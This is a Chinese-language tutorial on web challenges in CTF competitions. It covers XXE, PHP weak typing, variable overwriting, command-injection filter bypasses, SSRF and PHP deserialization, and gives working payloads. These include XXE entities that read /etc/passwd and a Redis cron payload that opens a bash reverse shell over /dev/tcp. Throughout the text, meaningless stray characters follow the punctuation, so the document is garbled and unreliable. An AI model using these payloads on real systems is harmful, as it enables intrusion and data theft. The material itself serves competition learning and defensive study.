這應(yīng)該是一個系列的文章臼疫，主要講述的是CTF中的Web內(nèi)容砰琢。
當然，對于作者這種CTF中Loser履植，這個系列的文章與其說是總結(jié)梳理计雌，不如說是預(yù)習筆記。
最后的一年半玫霎，不知道以后還能在這些沒用的東西上搞多久······

01 CTF Web介紹

CTF中的Web題型凿滤，就是給定一個Web網(wǎng)站传泊，選手要根據(jù)題目所提示的信息，找到網(wǎng)站上的flag字符串鸭巴。
做題的方法類似于滲透測試眷细，但通常不會是一個完整的滲透測試，而是用到滲透測試中的某一個或某幾個環(huán)節(jié)鹃祖∠担可能涉及信息搜集、各類漏洞發(fā)現(xiàn)與利用恬口、權(quán)限提升等等校读。
為了獲取flag，可能需要拿到管理員權(quán)限祖能，數(shù)據(jù)庫權(quán)限歉秫，甚至獲取網(wǎng)站所在服務(wù)器的權(quán)限。

一养铸、所需知識

• 語言：PHP雁芙、Python、JavaScript...
• 數(shù)據(jù)庫：MySQL钞螟、MSSQL...
• 服務(wù)器：Apache兔甘、Nginx...
• Web框架：ThinkPHP、Flask...
• 語言特性：弱類型鳞滨、截斷...
• 函數(shù)特性：is_numeric洞焙、strcmp、eregi...

1.HTTP抓包/改包

• 首先要知道HTTP請求拯啦、響應(yīng)流程澡匪，詳細了解可以參考《HTTP權(quán)威指南》。（很厚的一本書褒链，大牛們愛用這本書裝B唁情，Web領(lǐng)域的“九陽真經(jīng)”，把這本書啃下來就是張無忌了碱蒙，可是大多數(shù)人包括我在內(nèi)總想練速成的“葵花寶典”）
• 瀏覽器插件（Firefox）：個人覺得 F12 + Hackbar就夠了荠瘪，而且最新的Firefox將 F12和Hackbar 集成到了一起，用起來很順手赛惩。
• 工具：burpsuite神器哀墓，工具是好但是小白用起來可能需要一些時間去專門學習和熟悉。 下載地址喷兼、 FreeBuf教程篮绰、 i春秋教程

2.Web前端

• HTML+CSS+JavaScript：前端三劍客，學這個很輕松季惯，很容易在信安的路上越走越偏吠各，然后變成前端開發(fā)者臀突。
• 編碼：url編碼、html編碼贾漏、js編碼候学，可以參考這篇文章。
• Cookie纵散，緩存
• 跨域問題梳码，CSP策略

3.Web后端

• PHP：官方文檔
• Python：廖雪峰Python教程、官方文檔
• PHP框架：ThinkPHP伍掀、Yii
• Python框架：Flask掰茶、Tornado、Django
• Go框架：beego
• Session

4.數(shù)據(jù)庫和服務(wù)器

• 了解常見數(shù)據(jù)庫及區(qū)別：MySQL蜜笤、Oracle濒蒋、MongoDB
• 數(shù)據(jù)庫操作：基本語句、文件讀取把兔、寫入沪伙、權(quán)限、dnslog
• 服務(wù)器：配置主流服務(wù)器垛贤，Apache焰坪、Nginx
• 緩存引擎：Redis、Memcached

5.Linux

• shell
• Lua
• Docker

6.常見web漏洞

7.工具

• sqlmap
• Burpsuite
• Hackbar
• Proxy SwitchyOmega（瀏覽器代理插件）
• AWVS （web漏洞掃描）
• Kali（黑客的專屬系統(tǒng)）

二聘惦、題目類型

1.筑基（入門題目）

• 查看頁面源代碼，flag在注釋里
• 查看HTTP請求/響應(yīng)包儒恋，flag在cookie善绎、響應(yīng)頭中
• 備份文件（.bak，.swp诫尽，.swo）泄露
• 根據(jù)提示修改請求頭（User-Agent禀酱、X-Forwarded-For）
• JSFuck

(1)例子

HCTF2016 Web1：2099年的flag
根據(jù)提示：

only ios99 can get flag(Maybe you can easily get the flag in 2099)

猜測可能需要改造UA。
將User-Agent修改為Mozilla/5.0 (iPhone; CPU iPhone OS 99 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1牧嫉，這個需要對照Safari瀏覽器發(fā)出的UA進行修改剂跟。

ios99

(2)文件泄露總結(jié)

關(guān)于泄露的好文章

• 備份文件：.index.php.swp、.index.php.swo酣藻、.index.php.bak曹洽、.index.php~

• 源碼壓縮包：www.zip、root.zip辽剧、web.zip

• git / svn泄露：
  git泄露：www.xxx.com/.git/config送淆，之后使用工具GitHack可以獲取源碼 python GitHack.py URL/.git
  svn泄露：www.xxx.com/.svn/entries，利用工具dvcs-ripper獲取源碼

• 其它文件泄露：
  .idea目錄泄露:（使用了IntelliJ IDEA的工程怕轿，可泄露目錄結(jié)構(gòu)）偷崩，詳情可看這里
  .DS_Store：www.xxx.com/.ds_store辟拷，工具ds_store_exp
  .pyc文件:（python編譯后的字節(jié)碼文件）

(3)請求修改、重放

這里主要用好Burpsuite阐斜、瀏覽器F12就夠了衫冻，F(xiàn)irefox上的Hackbar也很方便，工具再多也沒用谒出。

(4)JSFuck

經(jīng)過JSFuck編碼后的JavaScript代碼隅俘，要查看其運行結(jié)果非常簡單，直接在頁面中進行調(diào)用即可到推，或者在Chrome瀏覽器的開發(fā)者工具中的Console中執(zhí)行即可考赛。

JSFuck.jpg

2.結(jié)丹(常規(guī)題目)

• 一個存在漏洞的網(wǎng)站
• 拿到數(shù)據(jù)庫上的flag（SQL注入）
• 拿到服務(wù)器上的flag（命令執(zhí)行、文件上傳）
• 拿到管理員的cookie莉测，flag在cookie里（XXE）
• 其它的一些漏洞利用（條件競爭颜骤、SSRF捣卤、XXE）

(1)SQL注入

實驗吧：
簡單的sql注入
簡單的sql注入2
簡單的sql注入3

(2)XXE

后端獲取一個xml文檔

<? php
$xml=simplexml_load_string($_GET['xml']);
print_r((string)$xml);

讀取本地文件

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [<!ENTITY file SYSTEM "file:///etc/passwd">]>
<root>&file;</root>

SSRF

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [<!ENTITY url SYSTEM "http://zzm.cat:8080">]>
<root>&url;</root>

XEE練習 + Writeup

3.元嬰(困難題目)

• 漏洞綜合利用（e.g. 注入+SSRF+反序列化）
• 少見的姿勢（e.g. 字符命令執(zhí)行）
• 少見的語言（Ruby哥捕、Perl）

例子：

HITCON2017:
babyfirst-revenge
babyfirst-revenge-v2

02 CTF Web技巧

一牧抽、PHP弱類型

弱等于號 " == "

false==""==0==NULL //true
"admin1"==0 //true
"1admin"==1 //true
"0e123456"=="0e4456789" //true
"0x1e240"=="123456" //true
0=="0e4456789" //true
[false]==[0] //true
"0x1e240"=="123456"==123456 //true

例題

<?php 
$flag = "xxxx";
if ($_GET['a'] != $_GET['b'] && md5($_GET['a']) == md5($_GET['b']))
{
  echo "Flag: ".$flag;
}

可以看一下這篇文章，從中可以得知所有"0e"加純數(shù)字的字符串均相互弱等于遥赚，及提交a=s878926199a和b=s155964671a即可

md5("s878926199a") =>
  "0e545993274517709034328855841020"
md5("s155964671a") =>
  "0e342768416822451524974117254469"

二扬舒、PHP函數(shù)

類型轉(zhuǎn)換

md5(['a'])===md5(['b']) //對數(shù)組MD5會返回NULL
strcmp([], 'a')===NULL //PHP>5.3版本數(shù)組和字符串比較返回NULL
in_array('abc', [0])===true //'abc'會被強制類型轉(zhuǎn)換
is_numeric('0e1')===true //科學計數(shù)法
in_array('abc', [0,1,2])===true //比較時會使用若等于（'abc'==0）

正則表達式（ereg/eregi）

1. 字符串對比解析，當ereg讀取字符串string時凫佛，%00后面的字符串不會被解析讲坎。
   這里 a=abcd%001234，可繞過

<?php
if (ereg("^[a-zA-Z]+$", $_GET['a']) === FALSE) {
  echo 'You password must be alphabet';
}
?>

2. 如果傳入數(shù)組愧薛，ereg返回NULL

三晨炕、變量覆蓋

extract()

extract()函數(shù)從數(shù)組中把變量導(dǎo)入到當前的符號表中。
對于數(shù)組中的每個元素厚满，鍵名用于變量名府瞄，鍵值用于變量值。
例如傳入auth=1，則會打印出"private!"

<?php
  $auth='0';
  // 這里可以覆蓋變量$auth的變量值
  extract($_GET);
  if($auth == 1){
    echo "private!";
  } else{
    echo "public!";
  }
?>

parse_str()

parse_str()的作用是解析字符串遵馆，并注冊成變量鲸郊。與parse_str()類似的函數(shù)還有 mb_parse_str()，parse_str() 將字符串解析成多個變量货邓，如果參數(shù) str 是 URL 傳遞入的查詢字符串(query string)秆撮，則將它解析為變量并設(shè)置到當前作用域。

<?php
  //var.php?var=new
  $var='init';
  parse_str($_SERVER['QUERY_STRING']);
  // $var 會變成 new
  echo $var;
?>

$$

$$會把變量本身的 key 當做名字换况，value 當做變量值

<?php
  $_CONFIG['extraSecure'] = true;
  
  // http://127.0.0.1/index.php?_CONFIG=123
  foreach(array('_GET', '_POST') as $method) {
    foreach($$method as $key=>$value) {
      // $key == _CONFIG
      // $$key == $_CONFIG
      // 這個函數(shù)會把 $_CONFIG 變量銷毀
      unset($$key);
    }
  }
  if ($_CONFIG['extraSecure'] == false){
    echo 'flag{****}';
  }
?>

練習

實驗吧 天網(wǎng)管理系統(tǒng)

四职辨、命令執(zhí)行

PHP中執(zhí)行系統(tǒng)命令的函數(shù)

system:     system("whoami");
eval:       eval("phpinfo();");
assert:     assert("phpinfo()");
exec:       echo exec("whoami");
passthru:   passthru("whoami");
shell_exec: echo shell_exec("whoami");

Bypass空格過濾

<符號
cat<flag
$IFS符號
cat${IFS}flag
cat$IFS"flag"
制表符
cat flag

命令分隔符

| 符號

amber@MAC:~/$    echo 1|echo 2
2

; 符號

amber@MAC:~/$    echo 1;echo 2
1
2

&&符號

amber@MAC:~/$    echo 1 && echo 2
1
2

利用$()，``執(zhí)行命令

$()戈二，``會將字符串當做命令執(zhí)行舒裤，并返回結(jié)果

amber@MAC:~/$    echo $(whoami)
amber

amber@MAC:~/$    echo `whoami`
amber

結(jié)合printf使用，可以繞過一些限制

amber@MAC:~/$    $(printf$IFS"\167\150\141\155\151")
amber

amber@MAC:~/$    $(printf$IFS"\x77\x68\x6f\x6d\x69")
amber

練習

http://web.jarvisoj.com:32798/

五觉吭、SSRF技巧

SSRF介紹

服務(wù)器獲取用戶傳入的url腾供，并訪問，如果不加過濾鲜滩，可能導(dǎo)致內(nèi)網(wǎng)探測伴鳖、文件讀取、攻擊內(nèi)網(wǎng)服務(wù)等

<?php
  // e.g. url=http://10.10.10.1
  // e.g. url=file://etc/passwd
  // e.g. url=dict://127.0.0.1:80
  $ch = curl_init($_GET['url']);
  echo curl_exec($ch);
  curl_close($ch);
?>

常出現(xiàn)在離線下載徙硅，站長工具榜聂，遠程頭像上傳等功能中

SSRF攻擊

SSRF文件讀取，內(nèi)網(wǎng)探測

file:///etc/passwd
dict://127.0.0.1:3306

SSRF攻擊內(nèi)網(wǎng)服務(wù)（redis為例）
修改dbfilename嗓蘑，將反彈shell的命令寫入定時任務(wù)

set 1 "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/ 127.0.0.1/2333 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save

SSRF防御

過濾傳入url的host（有沒有問題须肆？）

<?php
    function isLocal($ip){
        $long=ip2long($ip);
        $data=array(24=>'10.255.255.255',20=>'172.31.255.255',16=>'192.168.255.255');
        foreach ($data as $k => $v) {
            if ($long >> $k === ip2long($v)>>$k) {
                return true;
            }
        }
    }
    $url = $_GET['url'];
    $host = parse_url($url)['host'];
    if (isLocal(gethostbyname($host))) die();
    $ch = curl_init($url);
    echo curl_exec($ch);
    cuel_close($ch);
?>

parse_url和curl解析差異

SSRF.png

IP雙重綁定：如果同一個域名綁定了兩個IP，那么PHP中的gethostname會隨機返回一個桩皿。
但是curl在訪問這種域名的時候休吠，由于綁定的是兩個IP，curl會嘗試訪問每一個IP业簿，最終返回有效的那個

六、反序列化

介紹

序列化

數(shù)組序列化

原數(shù)組：['a'=>'str', 'b'=>1, 'c'=>false]
序列化后：a:3:{s:1:"a";s:3:"str";s:1:"b";i:1;s:1:"b";i:1;s:1:"c";b:0;}

對象序列化

對象序列化

對于PHP中的類C阳懂，屬性data="abc"會被序列化為不同的形式（%00代表空字符）
Public屬性：s:4:"data";s:3:"abc"
Private屬性：s:7"%00C%00data";s:3:"abc"
Protected屬性：s:7"%00*%00data";s:3:"abc"

其它數(shù)據(jù)類型

String（字符串）：s
Integer（整型）：i
Bool（Bool型）：b
NULL：N
Array（數(shù)組）：a
Object（對象）：o

魔術(shù)方法

__construct方法在對象誕生時調(diào)用梅尤，一般用來為成員屬性賦初值

function __construct($name="amy", $sex="male", $age=20)
{
  $this->name=$name;
  $this->sex=$sex;
  $this->age=$age;
}

__destruct方法在對象銷毀時調(diào)用

class C{
  public function __destruct() {
    echo "The object is destructed.";
  }
}

__toString方法在打印對象時調(diào)用

class C{
  public function __toString()
  {
    return "This is C";
  }
}

__sleep方法在對象序列化時調(diào)用

class C{
  public function __sleep() {
    echo "serialized";
  }
}
$c = new C;
serialize($c);

__wakeup方法在對象反序列化時調(diào)用

class C{
  public function __wakeup() {
    echo "unserialized";
  }
}
unserialize('0:1:"c":0:{}');

__call方法在試圖調(diào)用一個無法訪問（不存在、無權(quán)限）的方法時調(diào)用

class C{
  public function __call($name, $arguments) {
    echo "called";
  }
}
$c = new C;
$c->a();

PHP中可以利用的內(nèi)置類

SoapClient(__call方法調(diào)用時導(dǎo)致SSRF)

$a = new SoapClient(null,array('uri'=>'http://xxx.cat8080',
'location'=>'http://xxx.cat:8080'));
$b = serialize($a);
$c = unserialize($b);
$c->a();

Directorylterator(__construct方法調(diào)用時導(dǎo)致列目錄)

$c = new DirectoryIterator(".");
foreach($c as $cc) {
  echo $cc,"</br>";
}

練習

http://web.jarvisoj.com:32784/
Writeup